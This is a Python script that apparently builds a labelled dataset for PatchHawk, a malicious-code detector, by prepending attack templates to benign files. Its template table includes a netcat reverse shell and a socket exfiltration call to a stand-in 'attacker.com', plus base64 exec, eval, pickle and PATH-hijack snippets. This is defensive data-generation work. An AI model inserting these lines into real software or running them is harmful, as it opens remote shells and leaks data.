Spaces:
Running
Running
| """ | |
| Scenario generator for PatchHawk. | |
| Track A: Meta synthetic-data-kit CLI (optional, graceful fallback). | |
| Track B: Custom mutation engine that injects attack templates into benign | |
| Python files. Always produces ≥ 50 scenarios. | |
| Output: a single JSON file with fields: | |
| id, type, code_snippet, patch (or null), unit_test_code, | |
| label, source, attack_type | |
| """ | |
| import json | |
| import os | |
| import random | |
| import subprocess | |
| import tempfile | |
| import uuid | |
| from pathlib import Path | |
| # ============================================================ | |
| # Attack Templates for Mutation Engine (Track B) | |
| # ============================================================ | |
| ATTACK_TEMPLATES = { | |
| "typosquatting": { | |
| "inject": "import pythonn\n\n", | |
| "patch": "", | |
| }, | |
| "obfuscated_exec": { | |
| "inject": ( | |
| "import base64\n" | |
| "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n" | |
| ), | |
| "patch": "", | |
| }, | |
| "env_hijack": { | |
| "inject": ( | |
| "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n" | |
| ), | |
| "patch": "", | |
| }, | |
| "subprocess_backdoor": { | |
| "inject": ( | |
| "import subprocess\n" | |
| "try:\n" | |
| " subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\n" | |
| "except:\n" | |
| " pass\n\n" | |
| ), | |
| "patch": "", | |
| }, | |
| "eval_hidden": { | |
| "inject": ( | |
| "def safe_eval(x):\n" | |
| " return eval(x)\n" | |
| 'safe_eval(\'__import__("os").system("echo 1")\')\n\n' | |
| ), | |
| "patch": "", | |
| }, | |
| "pickle_deserialization": { | |
| "inject": ( | |
| "import pickle\n" | |
| "pickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n" | |
| ), | |
| "patch": "", | |
| }, | |
| "socket_exfil": { | |
| "inject": ( | |
| "import socket\n" | |
| "try:\n" | |
| " s = socket.socket()\n" | |
| " s.connect(('attacker.com', 80))\n" | |
| " s.sendall(b'exfiltrated data')\n" | |
| "except:\n" | |
| " pass\n\n" | |
| ), | |
| "patch": "", | |
| }, | |
| "malicious_import": { | |
| "inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n", | |
| "patch": "", | |
| }, | |
| } | |
| # ============================================================ | |
| # Benign file loader | |
| # ============================================================ | |
| def load_benign_files(benign_dir: str) -> list: | |
| files_data = [] | |
| if not os.path.exists(benign_dir): | |
| return files_data | |
| for filename in sorted(os.listdir(benign_dir)): | |
| if filename.endswith(".py"): | |
| with open(os.path.join(benign_dir, filename)) as fh: | |
| files_data.append({"filename": filename, "code": fh.read()}) | |
| return files_data | |
| # ============================================================ | |
| # Auto-generated lightweight unit tests | |
| # ============================================================ | |
| def auto_generate_unit_test(filename: str, code: str) -> str: | |
| """Produce a simple assertion that passes against the benign code.""" | |
| test = "import code\n" | |
| if "fibonacci" in code: | |
| test += "assert code.fibonacci(5) == 5\n" | |
| elif "factorial" in code: | |
| test += "assert code.factorial(5) == 120\n" | |
| elif "is_prime" in code: | |
| test += "assert code.is_prime(7) == True\n" | |
| elif "gcd" in code: | |
| test += "assert code.gcd(48, 18) == 6\n" | |
| elif "is_palindrome" in code: | |
| test += "assert code.is_palindrome('racecar') == True\n" | |
| elif "celsius_to_fahrenheit" in code: | |
| test += "assert code.celsius_to_fahrenheit(0) == 32\n" | |
| else: | |
| test += "assert True # module loaded successfully\n" | |
| return test | |
| # ============================================================ | |
| # Track B – custom mutation engine (always available) | |
| # ============================================================ | |
| def generate_track_b_scenarios(benign_files: list, num_samples: int = 55) -> list: | |
| """Generate proportional scenarios dynamically based on num_samples.""" | |
| scenarios = [] | |
| tp_count = int(num_samples * 0.45) | |
| fp_count = int(num_samples * 0.27) | |
| fn_count = num_samples - tp_count - fp_count | |
| # ── True Positives (45%) ────────────────────────────────── | |
| for i in range(tp_count): | |
| bf = random.choice(benign_files) | |
| attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items())) | |
| malicious_code = attack_data["inject"] + bf["code"] | |
| test_code = auto_generate_unit_test(bf["filename"], bf["code"]) | |
| scenarios.append( | |
| { | |
| "id": f"tp_{uuid.uuid4().hex[:8]}", | |
| "type": "true_positive", | |
| "code_snippet": malicious_code, | |
| "patch": bf["code"], | |
| "unit_test_code": test_code, | |
| "label": "malicious", | |
| "source": "mutation_engine", | |
| "attack_type": attack_name, | |
| } | |
| ) | |
| # ── False Positives (15) ───────────────────────────────── | |
| fp_templates = [ | |
| ( | |
| "fp_eval", | |
| "def safe_calc(expr):\n" | |
| " # Legit eval in controlled env\n" | |
| " return eval(expr, {'__builtins__': {}}, {})\n\n", | |
| ), | |
| ( | |
| "fp_requests", | |
| "import requests\n" | |
| "# Just checking internet\n" | |
| "try:\n" | |
| " requests.get('https://8.8.8.8', timeout=1)\n" | |
| "except:\n" | |
| " pass\n\n", | |
| ), | |
| ( | |
| "fp_os_environ", | |
| "import os\n" | |
| "# Setup proxy\n" | |
| "os.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n", | |
| ), | |
| ( | |
| "fp_base64", | |
| "import base64\n" | |
| "def encode_msg(msg):\n" | |
| " return base64.b64encode(msg.encode())\n\n", | |
| ), | |
| ( | |
| "fp_subprocess_legit", | |
| "import subprocess\n" | |
| "# Run a safe command for build process\n" | |
| "result = subprocess.run(['echo', 'build ok'], capture_output=True)\n\n", | |
| ), | |
| ] | |
| for i in range(fp_count): | |
| bf = random.choice(benign_files) | |
| fp_name, fp_code = random.choice(fp_templates) | |
| suspicious_code = fp_code + bf["code"] | |
| test_code = auto_generate_unit_test(bf["filename"], bf["code"]) | |
| scenarios.append( | |
| { | |
| "id": f"fp_{uuid.uuid4().hex[:8]}", | |
| "type": "false_positive", | |
| "code_snippet": suspicious_code, | |
| "patch": None, | |
| "unit_test_code": test_code, | |
| "label": "benign", | |
| "source": "mutation_engine", | |
| "attack_type": None, | |
| } | |
| ) | |
| # ── Functional / Clean (28%) ────────────────────────────── | |
| for i in range(fn_count): | |
| bf = random.choice(benign_files) | |
| test_code = auto_generate_unit_test(bf["filename"], bf["code"]) | |
| scenarios.append( | |
| { | |
| "id": f"fn_{uuid.uuid4().hex[:8]}", | |
| "type": "functional", | |
| "code_snippet": bf["code"], | |
| "patch": None, | |
| "unit_test_code": test_code, | |
| "label": "benign", | |
| "source": "mutation_engine", | |
| "attack_type": None, | |
| } | |
| ) | |
| return scenarios | |
| # ============================================================ | |
| # Track A – Meta synthetic-data-kit (optional) | |
| # ============================================================ | |
| def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10) -> list: | |
| """ | |
| Track A: Use Meta's synthetic-data-kit to generate high-quality | |
| code examples. Falls back gracefully if not installed. | |
| """ | |
| sdk_scenarios: list = [] | |
| # Check CLI availability | |
| try: | |
| subprocess.run( | |
| ["synthetic-data-kit", "--help"], | |
| capture_output=True, | |
| check=True, | |
| ) | |
| except (subprocess.SubprocessError, FileNotFoundError): | |
| print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.") | |
| return sdk_scenarios | |
| config_path = Path(__file__).parent / "sdk_config.yaml" | |
| if not config_path.exists(): | |
| print(f"⚠️ SDK config not found at {config_path}. Track A disabled.") | |
| return sdk_scenarios | |
| with tempfile.TemporaryDirectory() as tmpdir: | |
| tmp_path = Path(tmpdir) | |
| workspace = tmp_path / "sdk_workspace" | |
| workspace.mkdir() | |
| try: | |
| benign_dir = Path(__file__).parent / "benign" | |
| if benign_dir.exists(): | |
| subprocess.run( | |
| [ | |
| "synthetic-data-kit", | |
| "ingest", | |
| str(benign_dir), | |
| "--output", | |
| str(workspace / "ingested"), | |
| ], | |
| check=True, | |
| capture_output=True, | |
| ) | |
| subprocess.run( | |
| [ | |
| "synthetic-data-kit", | |
| "create", | |
| str(workspace / "ingested"), | |
| "--type", | |
| "qa", | |
| "-c", | |
| str(config_path), | |
| "--output", | |
| str(workspace / "created"), | |
| ], | |
| check=True, | |
| capture_output=True, | |
| timeout=600, | |
| ) | |
| subprocess.run( | |
| [ | |
| "synthetic-data-kit", | |
| "curate", | |
| str(workspace / "created"), | |
| "--output", | |
| str(workspace / "curated"), | |
| ], | |
| check=True, | |
| capture_output=True, | |
| ) | |
| output_json = workspace / "final_sdk.json" | |
| subprocess.run( | |
| [ | |
| "synthetic-data-kit", | |
| "save-as", | |
| str(workspace / "curated"), | |
| "--format", | |
| "json", | |
| "--output", | |
| str(output_json), | |
| ], | |
| check=True, | |
| capture_output=True, | |
| ) | |
| if output_json.exists(): | |
| with open(output_json) as fh: | |
| data = json.load(fh) | |
| for item in data: | |
| sdk_scenarios.append( | |
| { | |
| "id": f"tp_sdk_{uuid.uuid4().hex[:8]}", | |
| "type": "true_positive" | |
| if item.get("patch") | |
| else "functional", | |
| "code_snippet": item.get("code_snippet") | |
| or item.get("code"), | |
| "patch": item.get("patch"), | |
| "unit_test_code": item.get( | |
| "unit_test_code", "import code\nassert True" | |
| ), | |
| "label": "malicious" if item.get("patch") else "benign", | |
| "source": "synthetic_data_kit", | |
| "attack_type": item.get("attack_type", "llm_generated"), | |
| } | |
| ) | |
| except subprocess.TimeoutExpired: | |
| print("⚠️ SDK generation timed out.") | |
| except subprocess.CalledProcessError as e: | |
| msg = e.stderr.decode() if e.stderr else "Unknown error" | |
| print(f"⚠️ SDK command failed: {msg}") | |
| return sdk_scenarios | |
| # ============================================================ | |
| # Track HF – Hugging Face dataset loader (optional) | |
| # ============================================================ | |
| def generate_track_hf_scenarios( | |
| hf_dataset_id: str, | |
| split: str = "train", | |
| text_field: str = "code", | |
| num_samples: int = 0, | |
| only_python: bool = False, | |
| ) -> list: | |
| """ | |
| Load snippets from a Hugging Face dataset and return scenario dicts. | |
| - `hf_dataset_id`: e.g. "username/repo" or a dataset id on the Hub | |
| - `text_field`: field name in dataset containing the code/snippet | |
| - `num_samples`: 0 => load entire split, otherwise limit | |
| """ | |
| hf_scenarios: list = [] | |
| try: | |
| from datasets import load_dataset | |
| except Exception as e: | |
| print(f"⚠️ Install `datasets` (pip install datasets). Error: {e}") | |
| return hf_scenarios | |
| try: | |
| # If a local path is provided, prefer local loading: | |
| p = Path(hf_dataset_id) | |
| if p.exists(): | |
| # Saved dataset directory created by `save_to_disk` | |
| if p.is_dir(): | |
| try: | |
| from datasets import load_from_disk | |
| ds = load_from_disk(str(p)) | |
| except Exception: | |
| # Fall back to loading as files inside the dir | |
| ds = load_dataset("json", data_files=str(p / "*.jsonl")) | |
| else: | |
| # Single file: jsonl / json / ndjson or plain text | |
| if p.suffix.lower() in (".jsonl", ".json", ".ndjson"): | |
| ds = load_dataset("json", data_files=str(p)) | |
| else: | |
| # Treat as plain text file, one example per line | |
| with open(p, "r", encoding="utf-8") as fh: | |
| lines = [l.rstrip("\n") for l in fh if l.strip()] | |
| # create a dataset from python list | |
| from datasets import Dataset | |
| ds = Dataset.from_dict({"text": lines}) | |
| else: | |
| ds = load_dataset(hf_dataset_id, split=split) | |
| except Exception as e: | |
| print(f"⚠️ Could not load HF dataset {hf_dataset_id}: {e}") | |
| return hf_scenarios | |
| # optionally limit | |
| try: | |
| total = len(ds) | |
| except Exception: | |
| total = None | |
| if num_samples and num_samples > 0 and total: | |
| num = min(num_samples, total) | |
| try: | |
| ds = ds.select(range(num)) | |
| except Exception: | |
| pass | |
| # iterate over dataset rows | |
| for item in ds: | |
| code = None | |
| unit_test = "import code\nassert True" | |
| if isinstance(item, dict): | |
| # optional language filter | |
| if only_python: | |
| lang = (item.get("lang") or item.get("language") or "").lower() | |
| if lang and lang != "python": | |
| continue | |
| # prefer accepted/chosen field when present (e.g., 'chosen') | |
| for k in ("chosen", text_field, "code", "snippet", "text"): | |
| if k in item and item[k]: | |
| code = item[k] | |
| break | |
| # best-effort unit test / label / patch extraction | |
| unit_test = item.get("unit_test_code", unit_test) | |
| label = item.get("label") or item.get("classification") or "benign" | |
| patch = item.get("patch") | |
| attack_type = item.get("vulnerability") or item.get("attack_type") | |
| else: | |
| # plain examples (no fields) | |
| code = str(item) | |
| label = "benign" | |
| patch = None | |
| attack_type = None | |
| if not code: | |
| continue | |
| hf_scenarios.append( | |
| { | |
| "id": f"hf_{uuid.uuid4().hex[:8]}", | |
| "type": "true_positive" if patch or (isinstance(label, str) and label.lower() in ("malicious", "vuln", "vulnerable")) else "functional", | |
| "code_snippet": code, | |
| "patch": patch, | |
| "unit_test_code": unit_test, | |
| "label": "malicious" if (patch or (isinstance(label, str) and label.lower() in ("malicious", "vuln", "vulnerable"))) else "benign", | |
| "source": "huggingface_dataset", | |
| "attack_type": attack_type, | |
| } | |
| ) | |
| return hf_scenarios | |
| # ============================================================ | |
| # CLI entry point | |
| # ============================================================ | |
| def main(): | |
| import argparse | |
| parser = argparse.ArgumentParser(description="Generate scenarios for PatchHawk") | |
| parser.add_argument( | |
| "--benign-dir", | |
| type=str, | |
| default="patchhawk/data/benign/", | |
| ) | |
| parser.add_argument( | |
| "--output", | |
| type=str, | |
| default="patchhawk/data/scenarios.json", | |
| ) | |
| parser.add_argument( | |
| "--num-samples", | |
| type=int, | |
| default=55, | |
| help="Number of scenarios to generate with Track B (mutation engine).", | |
| ) | |
| parser.add_argument( | |
| "--use-sdk", | |
| action="store_true", | |
| help="Use Meta synthetic-data-kit (requires CLI + vLLM)", | |
| ) | |
| parser.add_argument( | |
| "--sdk-samples", | |
| type=int, | |
| default=10, | |
| help="Number of SDK samples to generate", | |
| ) | |
| parser.add_argument( | |
| "--hf-dataset", | |
| type=str, | |
| default=None, | |
| help="HuggingFace dataset id (e.g., username/repo) to import snippets from", | |
| ) | |
| parser.add_argument( | |
| "--hf-split", | |
| type=str, | |
| default="train", | |
| help="Split name to load from the HF dataset", | |
| ) | |
| parser.add_argument( | |
| "--hf-field", | |
| type=str, | |
| default="code", | |
| help="Field name in HF dataset that contains the code/snippet", | |
| ) | |
| parser.add_argument( | |
| "--hf-samples", | |
| type=int, | |
| default=0, | |
| help="Number of HF samples to use (0 = all)", | |
| ) | |
| parser.add_argument( | |
| "--hf-only-python", | |
| action="store_true", | |
| default=False, | |
| help="If set, only include HF examples where language/lang == python", | |
| ) | |
| args = parser.parse_args() | |
| benign_files = load_benign_files(args.benign_dir) | |
| if not benign_files: | |
| print(f"No benign files found in {args.benign_dir}. Create some first.") | |
| return | |
| # Track B (always) | |
| scenarios = generate_track_b_scenarios(benign_files, args.num_samples) | |
| # Track A (optional) | |
| if args.use_sdk: | |
| sdk = generate_track_a_scenarios_with_sdk( | |
| os.path.dirname(args.output), args.sdk_samples | |
| ) | |
| scenarios.extend(sdk) | |
| if sdk: | |
| print(f"Added {len(sdk)} SDK-generated scenarios.") | |
| # Track HF (optional) | |
| if getattr(args, "hf_dataset", None): | |
| hf = generate_track_hf_scenarios( | |
| args.hf_dataset, | |
| args.hf_split, | |
| args.hf_field, | |
| args.hf_samples, | |
| args.hf_only_python, | |
| ) | |
| scenarios.extend(hf) | |
| if hf: | |
| print(f"Added {len(hf)} HuggingFace scenarios.") | |
| random.shuffle(scenarios) | |
| os.makedirs(os.path.dirname(args.output), exist_ok=True) | |
| with open(args.output, "w") as fh: | |
| json.dump(scenarios, fh, indent=2) | |
| tp = len([s for s in scenarios if s["label"] == "malicious"]) | |
| bn = len([s for s in scenarios if s["label"] == "benign"]) | |
| print(f"✅ Total scenarios: {len(scenarios)}") | |
| print(f" Malicious (TP): {tp}") | |
| print(f" Benign (FP+fn): {bn}") | |
| print(f" Saved to {args.output}") | |
| if __name__ == "__main__": | |
| main() | |